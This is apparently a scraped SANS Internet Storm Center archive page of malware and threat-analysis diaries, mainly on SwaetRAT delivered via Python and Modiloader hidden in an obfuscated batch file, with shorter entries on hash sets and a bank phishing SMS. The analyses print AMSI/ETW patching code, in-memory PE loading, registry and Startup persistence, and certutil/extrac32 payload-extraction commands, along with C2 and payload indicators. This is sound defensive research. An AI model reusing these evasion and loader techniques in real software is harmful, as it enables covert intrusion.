When I teach FOR610[1], I like to use a funny quotation with my students: “Make malware happy!” What does it mean? Yes, we like malware, and we need to treat it in a friendly way. To help the malware work or detonate successfully, it’s recommended that we replicate the environment where it was discovered (or at least, as much as possible). This is not always easy because we often receive a sample outside of its context.
Tag Archives: Security
SwaetRAT Delivery Through Python, (Fri, Jan 3rd)
We entered a new year, but attack scenarios have not changed (yet). I found a Python script with an interesting behavior[1] and a low Virustotal score (7/61). It targets Microsoft Windows hosts because it starts by loading all libraries required to call Microsoft API Calls and manipulate payloads:
from System.Reflection import Assembly from ctypes import windll from ctypes import wintypes import ctypes
I have already covered multiple Python scripts that interact with the operating system at the API level.
Before handling the next stage, the script performs live patching[2] of interesting API calls to cover its tracks. The first one is pretty common, AmsiScanBuffer()
, but it also patches EtwEventWrite()
[3] to prevent the creation of events.
The code (beautified) is the same for both. The very first bytes of the API calls are overwritten to return an expected value:
if platform.architecture()[0] == '64bit': etw_patch = (ctypes.c_char * 4)(0x48, 0x33, 0xc0, 0xc3) if platform.architecture()[0] != '64bit': etw_patch = (ctypes.c_char * 5)(0x33, 0xc0, 0xc2, 0x14, 0x00) pEventWrite = GetProcAddress(GetModuleHandleA(b"ntdll.dll"), b"EtwEventWrite") oldprotect = wintypes.DWORD(0) VirtualProtect(pEventWrite, ctypes.sizeof(etw_patch), RWX, ctypes.byref(oldprotect)) RtlMoveMemory(pEventWrite, etw_patch, ctypes.sizeof(etw_patch)) VirtualProtect(pEventWrite, ctypes.sizeof(etw_patch), oldprotect, ctypes.byref(oldprotect))
Finally, the script decodes, loads, and invokes the next stage:
PAYLOAD_DATA = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAA [...string is too long...]" assembly = Assembly.Load(base64.b64decode(PAYLOAD_DATA)) instance = assembly.CreateInstance(assembly.EntryPoint.Name) assembly.EntryPoint.Invoke(instance,None)
You will probably recognize the first bytes of the payload, we are facing a PE file[4].
remnux@remnux:/MalwareZoo/20250102$ base64dump.py -n 10 stage1.py ID Size Encoded Decoded md5 decoded -- ---- ------- ------- ----------- 1: 16 GetModuleHandleA ..L...xv.vW. 1b7ad174aff72b50b2484077b9fe6e0c 2: 16 GetModuleHandleA ..L...xv.vW. 1b7ad174aff72b50b2484077b9fe6e0c 3: 16 GetModuleHandleA ..L...xv.vW. 1b7ad174aff72b50b2484077b9fe6e0c 4: 16 GetModuleHandleA ..L...xv.vW. 1b7ad174aff72b50b2484077b9fe6e0c 5: 16 GetModuleHandleA ..L...xv.vW. 1b7ad174aff72b50b2484077b9fe6e0c 6: 179544 TVqQAAMAAAAEAAAA MZ.............. 0ce61b311f5694e8d3c22ff1729cf805 remnux@remnux:/MalwareZoo/20250102$ base64dump.py -n 10 stage1.py -s 6 -d | file - /dev/stdin: PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
The executable is a .Net binary that can be easily disassembled (not obfuscated) and reversed.
First, it copies itself to "%LOCALAPPDATA%Microsoft_OneDrive.exe
" and checks if it is executed from this directory. This is a nice trick because many sandboxes execute samples always from the same directory eg. C:Temp.
If so, it will extract the next stage. It also creates the directory "%LOCALAPPDATA%Xbox
". Persistence is implemented via a registry key and a link file in the Startup folder:
public static void __PER_v4_() { string text = "SoftwareSTD"; string text2 = "DDD"; try { RegistryKey registryKey = Registry.CurrentUser.CreateSubKey(text); registryKey.SetValue(text2, """ + Process.GetCurrentProcess().MainModule.FileName.ToString() + """); registryKey.Close(); } catch (Exception) { } try { WshShell wshShell = (WshShell)Activator.CreateInstance(Marshal.GetTypeFromCLSID(new Guid("72C24DD5-D70A-438B-8A42-98424B88AFB8"))); if (Program.<>o__0.<>p__0 == null) { Program.<>o__0.<>p__0 = CallSite<Func<CallSite, object, IWshShortcut>>.Create(Binder.Convert(CSharpBinderFlags.ConvertExplicit, typeof(IWshShortcut), typeof(Program))); } IWshShortcut wshShortcut = Program.<>o__0.<>p__0.Target(Program.<>o__0.<>p__0, wshShell.CreateShortcut(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "Winexe.lnk")); wshShortcut.TargetPath = "powershell.exe"; wshShortcut.Arguments = "Start-Process -FilePath (Get-ItemProperty 'HKCU:" + text + "')." + text2; wshShortcut.WindowStyle = 7; wshShortcut.Save(); } catch (Exception) { } }
Finally, the next payload is decoded:
new WebClient(); string hex = "4D5A90000300000004000000FFFF0000B8000000[...string is too long...]"; try { Thread.Sleep(1500); } catch { } try { Program.Run("C:WindowsMicrosoft.NETFrameworkv4.0.30319aspnet_compiler.exe", Program.BA(hex), false);
The hex variable is decoded using the BA()
function:
public static byte[] BA(string hex) { int length = hex.Length; byte[] array = new byte[length / 2]; for (int i = 0; i < length; i += 2) { array[i / 2] = Convert.ToByte(hex.Substring(i, 2), 16); } return array; }
The next stage (SHA256: f8ff16829e8fe1d06126c42c76b2bf48c62a02d1c6426e448e723168ecdf19fc) is the SwaetRAT itself. Another .Net binary, non-obfuscated, you can see the RAT capabilities directly during the disassembly:
The malware copies itself in another location: "%APPDATA%CCleaner.exe
". The configuration can be easily extracted:
It's always interesting to perform some threat intelligence and I found interesting relations to this RAT:
- The sample (f8ff16829e8fe1d06126c42c76b2bf48c62a02d1c6426e448e723168ecdf19fc) has been identified in another campaign[5]
- The sample has been covered by eSentire[6] in 2023
The RAT C2 server can be extracted from the payload:
{ "c2": [ "144[.]126[.]149[.]221:7777" ], "rule": "Swaetrat", "family": "swaetrat" }
[1] https://www.virustotal.com/gui/file/8693e1c6995ca06b43d44e11495dc24d809579fe8c3c3896e972e2292e4c7abd/details
[2] https://isc.sans.edu/diary/Live+Patching+DLLs+with+Python/31218
[3] https://learn.microsoft.com/en-us/windows/win32/devnotes/etweventwrite
[4] https://isc.sans.edu/diary/Searching+for+Base64encoded+PE+Files/22199
[5] https://isc.sans.edu/diary/ExelaStealer+Delivered+From+Russia+With+Love/31118
[6] https://www.esentire.com/blog/phantomcontrol-returns-with-ande-loader-and-swaetrat
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Goodware Hash Sets, (Thu, Jan 2nd)
In the cybersecurity landscape, we all need hashes! A hash is the result of applying a special mathematical function (a “hash function”) that transforms an input (such as a file or a piece of text) into a fixed-size string or number. This output, often called a “hash value,” “digest,” or “checksum,” uniquely represents the original data. In the context of this diary, hashes are commonly used for data integrity checks. There are plenty of them (MD5, SHA-1, SHA-2, SHA-256, …), SHA256 being the most popular for a while because older like MD5 are considered as broken because researchers have demonstrated practical collision attacks.
Hashes are a nice way to identify malware samples, payload, or any type of suspicious files (I usually share the hash of the malware analyzed in my diaries). In your threat-hunting process, you can search for interesting files across your infrastructure via sets of malware hashes. Some of them are freely available like on Malware Bazaar[1].
But, other sets of hashes are also interesting when they contain hashes for safe files. The approach is the same: Instead of searching for malicious files, you verify that files on your hosts are good.
Exacorn has released an interesting ZIP archive[2] with “good ware” (as opposed to “malware”). The file (2GB) provides 12M hashes and filenames:
Pay attention that some files might be flagged by some antivirus solutions. For example, I searched for "putty.exe" in the file. One of the returned hashes is: 6CDBE5323E1DEC7102D86C60458D6C7465807E80516D63F2EE509625C1DF2416[3].
It’s a perfect opportunity to remind you that other projects exist. The ones that I use regularly:
- The National Software Reference Library (NSRL) project[4]
- The CIRCL.lu Hash Lookup API[5]
- Hashsets.com [6] (not 100% free)
I like the second one because it includes the NSRL lists and can be used in an automated way.
We love hashes!
[1] https://bazaar.abuse.ch/export/
[2] https://www.hexacorn.com/blog/2024/12/31/clean-hash-set-12m-rows/
[3] https://www.virustotal.com/gui/file/6cdbe5323e1dec7102d86c60458d6c7465807e80516d63f2ee509625c1df2416
[4] https://www.nist.gov/itl/ssd/software-quality-group/national-software-reference-library-nsrl/about-nsrl
[5] https://www.circl.lu/services/hashlookup/
[6] https://www.hashsets.com
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
No Holiday Season for Attackers, (Tue, Dec 31st)
While most of us are preparing the switch to a new year (If it’s already the case for you: Happy New Year!), Attackers never stop and implement always new tricks to defeat our security controls. For a long time now, we have been flooded by sextortion emails. This is a kind of blackmail where someone threatens to share explicit images or videos unless the victim meets their demands. Even today, I receive regularly some of them.
Changes in SSL and TLS support in 2024, (Mon, Dec 30th)
With the end of the year quickly approaching, it is undoubtedly a good time to take a look at what has changed during the past 12 months. One security-related area, which deserves special attention in this context, is related to the use of different versions of SSL and TLS on various servers on the internet, since information about support for these protocols can provide us with a good informal indicator for the overall “level of security” on the global network as a whole.
Phishing for Banking Information, (Fri, Dec 27th)
It is again the time of the year when scammers are asking to verify banking information, whether it is credit cards, bank card, package shipping information, winning money, etc. Last night I received a text message to verify a credit card, it is case a Bank of Montreal (BMO) credit card.
From Bank of Montreal (BMO) website scam alerts, they uses a specific SMS number to send a text to their consumers: "The only BMO Alert you will receive on your mobile device via SMS regarding your accounts and credit cards will come from our 6-digit number “266898.” Our code never changes, so use this code to determine if it is BMO messaging you." [1] It is important to know how a bank will contact your by SMS. This is a copy of the text I received.
Is it Phishing? Any Suspicious Clues that Stand Out?
- The text I received was from a (438) area code and not from BMO, that is the first error.
- The second error is the card number "Starting in 5510 29**" which normally is the last 4 digits of the card that appears on statements vs. the beginning.
- The last clue is the website that contains spelling errors: bmo-securltyverlfy1[.]com [4] -> The website is spelled with the letter "l" vs the letter "i". This domain was registered on the 2024-12-11 [5] just in time for the holiday season.
Reviewing Domain Information
This domain resolves to IP 34.155.192.52 (ASN 396982). A review of VirusTotal relationship information from this domain shows as of this writing, 81 domains [2] have been created since the 23 Dec 2024 under this IP address targeting Canada Post, Scotiabank, rebate information, etransfer, Costco rewards, etc.
Indicators
34.155.192.52
bmo-securltyverlfy1[.]com
It is important to review carefully the data before entering any information. Stay safe.
[1] https://www.bmo.com/en-ca/main/personal/security-centre/scam-alerts/
[2] https://www.virustotal.com/gui/ip-address/34.155.192.52/relations
[3] https://www.virustotal.com/graph/34.155.192.52
[4] https://www.hybrid-analysis.com/sample/c76cbf6e22734f177e024e1fee02ed17a53413e0dfee02c6a6601be28280b167
[5] https://www.scamadviser.com/check-website/bmo-securltyverlfy1.com?utm_source=hybridanalysis
[6] https://www.sans.org/security-awareness-training/
———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Capturing Honeypot Data Beyond the Logs, (Thu, Dec 26th)
By default, DShield Honeypots [1] collect firewall, web and cowrie (telnet/ssh) [2] data and log them on the local filesystem. A subset of this data is reported to the SANS Internet Storm Center (ISC) where it can be used by anyone [3]. A common question that comes up from new users is whether there is any benefit to collecting PCAP data from the honeypots if the active services are already being logged. One example I often give of a useful benefit of having PCAPs is HTTP POST data. This data is not currently captured within the web honeypot logs, but can be seen within the PCAP data.
Compiling Decompyle++ For Windows, (Wed, Dec 25th)
Occasionaly I decompile Python code, with decompilers written in Python. Recently I discovered Decompyle++, a Python disassembler & decompiler written in C++.
It's very easy to compile for Linux, but a bit more difficult for Windows.
This is how I compiled Decompyle++ on Windows:
I used Microsoft Visual Studio Community 2022.
First I launch the Visual Studio 2022 Developer Command Prompt:
Then I download Decompyle++'s source code and navigate to the containing directory.
There I launch this command: cmake .
And then I can start compilation (I'm compiling the Release configuration): msbuild pycdc.sln -t:Rebuild -p:Configuration=Release
And then I can find the disassembler (pycdas.exe) and decompiler (pycdc.exe) in the Release folder:
Here I use pycdc.exe to decompile a .pyc file:
In case you can't or don't want to compile this yourself, I'm sharing the executables I compiled here.
Didier Stevens
Senior handler
blog.DidierStevens.com
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Modiloader From Obfuscated Batch File, (Mon, Dec 23rd)
My last investigation is a file called “Albertsons_payment.GZ”, received via email. The file looks like an archive but is identified as a picture by TrID:
Collecting data from file: Albertsons_payment.GZ 100.0% (.PG/BIN) PrintFox/Pagefox bitmap (640x800) (1000/1)
Finally, it’s a Windows Cabinet file:
remnux@remnux:/MalwareZoo/20241218$ cabextract -t Albertsons_payment.GZ Testing cabinet: Albertsons_payment.GZ Chine_ana22893D347515193D264135FF38996037FF515169loodatke.PNG OK dc156637aebf04336700a9bc71c78aad OK 7cd592cb2f2179e188e9e99cb7c06bba Svcrhpjadgyclc.cmd OK 7afcba92a35ba26fcde12f3aba8ff7d8
The archive contains a picture that mimics a document:
The file with strange characters contains only an integer value:
64928
(The purpose is unknown at this time)
The .cmd file looks much more interesting!
Yes, even Windows bat files can be deeply obfuscated! The obfuscation used by the Attacker is called “string slicing”. Commands are reconstructed by extracting characters from a string. Here is a simple example:
set “VARIABLE=abcdef" echo %VARIABLE:~2,1%” c
The file seems to contain an interesting payload:
remnux@remnux:/MalwareZoo/20241218/files$ grep "----" Svcrhpjadgyclc.cmd %XbymqYoxZh% -----BEGIN X509 CRL----- -----END X509 CRL-----
Based on the file size, the deobfuscate process will take some time but also because the technique above is used multiple times. Let’s execute the script and capture its behaviour:
Here are the most interesting action performed by the script. The script uses a LOLbin called extrac32.exe[1]. To defeat security rules looking for suspicious processes, it copies commands to another directory. First cmd.exe:
C:WindowsSystem32extrac32 /C /Y C:WindowsSystem32cmd.exe "C:UsersPublicalpha.exe"
Then certutil.exe:
C:UsersPublicalpha /c extrac32 /C /Y C:WindowsSystem32certutil.exe C:UsersPublickn.exe
Based on the grep command (see above), we have an interesting payload in this file. Indeed, the copy of certutil.exe is used to extract the next stage from the .cmd file:
C:UsersPublicalpha /c C:UsersPublickn -decodehex -F "C:UsersREMDesktopfolderSvcrhpjadgyclc.cmd" "C:UsersPublicspoolsv.MPEG" 9 C:UsersPublicalpha /c C:UsersPublickn -decodehex -F "C:UsersPublicspoolsv.MPEG" "C:UsersPublicLibrariesspoolsv.COM" 12
The next stage is spoolsv.com[2] (SHA256:baa12b649fddd77ef62ecd2b3169fab9bb5fbe78404175485f9a7fb48dc4456d).
The payload is a Delphi-based malware that looks to be Modiloader[3]. It tries to fetch the next stage from this URL: hxxps://swamfoxinnc[.]com/233_Svcrhpjadgy. The site does not provide the payload anymore but I was able to grab it from Virustotal. I simulated the website and content in my lab but spoolsv.com crashes! It just performed the DNS lookup but did not fetched the URL…
[1] https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/extract
[2] https://www.virustotal.com/gui/file/baa12b649fddd77ef62ecd2b3169fab9bb5fbe78404175485f9a7fb48dc4456d
[3] https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Christmas "Gift" Delivered Through SSH, (Fri, Dec 20th)
Christmas is at our doors and Attackers use the holiday season to deliver always more and more gifts into our mailboxes! I found this interesting file this morning: "christmas_slab.pdf.lnk"[1]. Link files (.lnk) are a classic way to execute something malicious on the victim's computer but the technique used here is interesting.